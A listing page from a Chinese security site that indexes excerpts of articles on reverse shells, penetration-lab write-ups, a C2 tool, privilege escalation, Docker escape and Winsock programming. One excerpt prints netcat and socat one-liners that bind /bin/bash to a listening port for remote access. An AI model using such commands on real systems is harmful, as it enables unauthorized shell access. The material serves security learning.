socket - 第 19 | CN-SEC 中文网

安全百科

netlink实时获取网络信息原理分析

最近在做主机侧网络连接相关的调研，发现通过 linux 自带的netlink能实时获取网络连接五元组信息，可以用于网络活动可视化、异常连接检测、安全策略优化以及审计等功能，但网络上找到的相关文章不多，...

06月02日42 views评论

阅读全文

安全文章

Linux反弹Shell的一些方法

Netcat目标机：nc -lp [监听端口] -e /bin/bash攻击机：nc [目标IP] [目标监听的端口]Socat目标机：socat TCP-LISTEN:[监听端口号] EXEC:/b...

06月01日31 views评论

阅读全文

安全文章

打靶总结-过程及思路系列29

也许你没有看过《Kali Linux 渗透测试》这门课程，但你一定听说过！这门课别名【177】(有177个课时），在众多 Kali 课程中，这门课程以其卓越的质量和完善的教学体系脱颖而出，讲师是苑房弘...

05月31日39 views评论

阅读全文

安全文章

打靶总结-过程及思路系列30

05月31日40 views评论

阅读全文

安全文章

SOCIALNETWORK打靶记录

一信息收集首先对靶机进行ip发现与端口及应用版本信息扫描：dirsearch和Windows平台上的御剑，本质上是一样的。对隐藏路径进行爬取和发现：打开后发现是一个代码执行页面如果过滤不严格可能可以...

05月28日21 views评论

阅读全文

安全工具

Azure 应用程序代理 C2

随着对域前端和检测等技术的防御日益加强，在识别常见命令和控制 (C2) 流量模式方面变得更加有效，我们适应不同出口方法的能力在不断更新。要创建应用程序代...

05月18日47 views评论

阅读全文

安全文章

干货 | Shell反弹姿势（Linux+Windows）

由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！常用shell反弹命令和方法（linux）环境准备：一、bash反弹：二、netcat反弹三、python反弹（pytho2,3都可...

05月16日32 views评论

阅读全文

程序逆向

windows套接字I/0模型-重叠IO(overlapped)模型

1.适用于除Windows CE之外的各种Windows平台.在使用这个模型之前应该确保该系统安装了Winsock2.重叠模型的基本设计原理是使用一个重叠的数据结构，一次投递一个或多个Winsock ...

05月14日63 views评论

阅读全文

程序逆向

windows套接字I/0模型-WSAAsyncSelect 模型

1.WSAAsyncSelect 模型简介WSAAsyncSelect 是 Windows 网络编程中的一种 I/O 多路复用模型，它允许程序员在 Windows 消息循环中注册网络事件回调函数，以便...

05月09日31 views评论

阅读全文

CTF专场

2023 D^3CTF writeup by 万年三等奖

HEADER由于预备队W4ntY0u成员也对本次比赛有高度兴趣，故安排其与主队一起以“万年三等奖”作为队名参加了AntCTF x D^3CTF，一方面是为了避免两队都有可能获奖的情况下占用了其他师傅们...

05月02日251 views评论

阅读全文

linux提权系列30: 追猎千里

经过了长达29篇的文章，可以看到非常精彩的提权行为。作为一个主机入侵测试系统的码农，很多时候需要对于这种行为进行检测，从而保证系统的安全。那么，从哪些方面来保证呢？敏感文件的权限检测从这个系列来看，大...

04月27日安全文章110 views评论

阅读全文

安全文章

linux提权系列25: [训练营]docker逃逸1

到目前为止，已经了解了 Docker 是什么以及它是如何工作的。由于已经看到它创建了在应用程序级别隔离的容器，这意味着两个容器彼此不认识，但 docker 本身作为附加实用程序在主机系统上运行。此外，...

04月24日131 views评论

阅读全文

在线咨询

微信